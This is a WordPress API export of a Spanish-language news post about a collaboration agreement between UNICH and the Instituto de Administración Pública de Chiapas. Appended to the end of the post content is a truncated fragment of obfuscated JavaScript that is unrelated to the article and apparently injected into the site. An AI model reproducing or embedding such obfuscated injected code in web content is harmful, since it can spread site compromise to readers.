{"id":8173,"date":"2023-01-19T03:54:36","date_gmt":"2023-01-19T03:54:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8173"},"modified":"2023-01-19T03:54:36","modified_gmt":"2023-01-19T03:54:36","slug":"unich-e-iap-chiapas-firman-convenio-de-colaboracion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8173","title":{"rendered":"Unich e IAP Chiapas, firman convenio de colaboraci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-18-at-11.36.07-AM-1024x768.jpeg\" alt=\"\" class=\"wp-image-8174\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-18-at-11.36.07-AM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-18-at-11.36.07-AM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-18-at-11.36.07-AM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-18-at-11.36.07-AM-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-18-at-11.36.07-AM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- La Rectora de la Universidad Intercultural de Chiapas (UNICH), Leticia Pons Bonals, suscribi\u00f3 convenio de colaboraci\u00f3n para emprender acciones e iniciativas conjuntas, con el presidente del Instituto de Administraci\u00f3n P\u00fablica de Chiapas, Fernando \u00c1lvarez Sim\u00e1n.<\/p>\n\n\n\n<p>Durante su intervenci\u00f3n, Leticia Pons Bonals, Rectora de la UNICH, reconoci\u00f3 el prestigio y el trabajo que viene desarrollando el Instituto de Administraci\u00f3n P\u00fablica en favor de las y los servidores p\u00fablicos, sobre todo el inter\u00e9s en firmar este instrumento legal el cual contribuir\u00e1 al fortalecimiento de sus objetivos que tienen ambas instituciones educativas.<\/p>\n\n\n\n<p>En su mensaje el presidente del IAP Chiapas, destac\u00f3 que que la UNICH, cumple una noble visi\u00f3n, de impartir programas educativos de alta calidad orientados a formar profesionales e intelectuales comprometidos con el desarrollo econ\u00f3mico y cultural en los \u00e1mbitos comunitario, regional y nacional, cuyas actividades contribuyen a promover un proceso de revaloraci\u00f3n y revitalizaci\u00f3n de las lenguas y culturas originarias como de los procesos de generaci\u00f3n del conocimiento de estos pueblos Chiapanecos.<\/p>\n\n\n\n<p>Expres\u00f3 su benepl\u00e1cito por realizar esta alianza estrat\u00e9gica educativa que fortalecer\u00e1 la gesti\u00f3n del desarrollo interinstitucional a trav\u00e9s de la educaci\u00f3n y capacitaci\u00f3n.<\/p>\n\n\n\n<p>Ambos funcionarios coincidieron que el Gobernador del Estado, Dr. Rutilio Escand\u00f3n Cadenas y presidente honor\u00edfico del IAP Chiapas, viene impulsando programas de profesionalizaci\u00f3n para las y los servidores p\u00fablicos de los tres \u00f3rdenes de gobierno, ese gran inter\u00e9s del mandatario estatal motiva a la promoci\u00f3n y alianzas que busquen ese objetivo del gobierno del estado.<\/p>\n\n\n\n<p>En el evento estuvieron presentes los integrantes del comit\u00e9 acad\u00e9mico del Instituto de Administraci\u00f3n P\u00fablica, su personal directivo y administrativo por parte de la Universidad Intercultural, el abogado general y la secretaria administrativa.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- La Rectora de la Universidad Intercultural de Chiapas (UNICH), Leticia Pons Bonals, suscribi\u00f3 convenio de colaboraci\u00f3n para emprender acciones e iniciativas conjuntas, con el presidente del Instituto de Administraci\u00f3n P\u00fablica de Chiapas, Fernando \u00c1lvarez Sim\u00e1n. Durante su intervenci\u00f3n, Leticia Pons Bonals, Rectora de la UNICH, reconoci\u00f3 el prestigio &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8174,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8173","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8173","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8173"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8173\/revisions"}],"predecessor-version":[{"id":8175,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8173\/revisions\/8175"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8174"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}